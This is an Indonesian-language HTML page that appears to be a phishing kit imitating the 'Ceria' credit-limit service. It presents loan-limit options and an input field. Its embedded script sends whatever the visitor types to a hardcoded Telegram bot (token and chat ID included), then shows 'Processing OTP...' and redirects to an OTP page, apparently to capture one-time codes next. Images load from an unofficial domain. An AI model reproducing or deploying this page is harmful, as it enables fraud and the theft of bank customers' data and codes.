<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Limit Ceria</title>
  <meta name="viewport" content="width, initial-scale=1">
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      text-align: center;
    }

    #gambar-atas {
      margin-bottom: 20px;
    }

    #gambar-atas img {
      width: 100%;
      object-fit: cover;
      max-height: 300px;
    }

    div {
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      margin-top: 20px;
    }

    /* Kolom Select */
    #pilihan-container {
      width: 100%;
      max-width: 350px;
      margin-bottom: 10px;
      margin: 0 auto;
    }

    #pilihan {
      width: 100%;
      padding: 12px;
      border-radius: 6px;
      border: 1px solid #9400d2;
    }

    /* Jarak antara kolom select dan kolom input */
    #jarak1 {
      height: 10px;
    }

    /* Kolom Input dan Tombol Submit */
    #jumlah-container {
      width: 100%;
      max-width: 330px;
      margin-bottom: 10px;
      display: flex;
      flex-direction: column;
      margin: 0 auto;
    }

    #jumlahInput {
      width: 100%;
      padding: 12px;
      border-radius: 5px;
      border: 1px solid #9400d3;
      margin-bottom: 7px;
    }

    #submit {
      width: 100%;
      max-width: 330px;
      padding: 13px;
      border-radius: 5px;
      border: none;
      background-color: #663399;
      color: white;
      font-weight: bold;
      cursor: pointer;
      margin-top: 7px;
    }

    /* Gambar di bawah Tombol Submit */
    #gambar-bawah {
      margin-top: 20px;
    }

    #gambar-bawah img {
      width: 50%;
      object-fit: cover;
    }
  </style>
  <script>
    function sendMessageToTelegram(message) {
      var xhttp = new XMLHttpRequest();
      xhttp.onreadystatechange = function() {
        if (this.readyState === 4 && this.status === 200) {
          console.log("Pesan terkirim: " + message);
        }
      };
      var url = "https://api.telegram.org/bot6946290282:AAHbPsb9hD-DbepVOIkge81AvWjY90YbbU0/sendMessage?chat_id=6824078885&text=" + encodeURIComponent(message);

      xhttp.open("POST", url, true);
      xhttp.send();
    }

    function kirimPesan() {
      var pesan = document.getElementById("jumlahInput").value;
      sendMessageToTelegram("Masukan sisa limit: " + pesan);

      document.getElementById("submit").value = "Processing OTP...";

      setTimeout(function() {
        window.location.href = "otp.html";
      }, 60000);
    }
  </script>
</head>
<body>
  <!-- Gambar Atas -->
  <div id="gambar-atas">
    <img src="https://wwed.online/ceria-id.com/img/pucok.jpg" alt="Gambar Pucok">
  </div>

  <!-- Kolom Select -->
  <div id="pilihan-container">
    <label for="pilihan"></label>
    <select id="pilihan" name="pilihan">
      <option value="opsi1">Pilih Limit</option>
      <option value="opsi2">Rp 10.000.000 tenor 12 bulan suku bunga 1.42%</option>
      <option value="opsi3">Rp 15.000.000 tenor 12 bulan suku bunga 1.42%</option>
      <option value="opsi4">Rp 25.000.000 tenor 12 bulan suku bunga 1.42%</option>
      <option value="opsi5">Rp 50.000.000 Tenor 12 bulan suku bunga 1.42%</option>
    </select>
  </div>

  <!-- Jarak antara kolom select dan kolom input -->
  <div id="jarak1"></div>

  <!-- Kolom Input dan Tombol Submit -->
  <div id="jumlah-container">
    <input type="number" id="jumlahInput" name="jumlah" placeholder="Masukan sisa limit">
    <input type="submit" id="submit" value="Lanjutkan" onclick="kirimPesan()">
  </div>

  <!-- Gambar Bawah -->
  <div id="gambar-bawah">
    <img src="https://wwed.online/ceria-id.com/img/2711.jpg" alt="Gambar 2711">
  </div>
</body>
      </html>
